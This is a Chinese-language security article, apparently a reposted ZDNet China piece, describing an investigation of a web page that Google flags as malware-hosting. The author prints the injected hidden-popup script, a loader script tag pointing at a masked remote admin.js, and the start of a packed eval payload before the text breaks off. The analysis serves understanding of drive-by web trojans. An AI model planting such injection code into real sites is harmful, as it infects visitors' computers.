一切福田,不離方寸,從心而覓,感無不通。

以毒攻毒,直捣“毒窟”

一,、陷入毒窝

我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。

测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。

1.探毒

第一步:下载网页
(为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。

第二步:分析网页代码

用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码:

<SCRIPT language=javascript>
window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>

这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。

第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下:

<script language=javascript src="http://my.*.com/admin.js>"; </script>

这是一个木马脚本,通过脚本调用了一个js文件。
第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下:

eval(function(p,a,c,k,e,d){e=function(c){return(c

http://net.zdnet.com.cn/network_security_zone/2007/1225/690486.shtml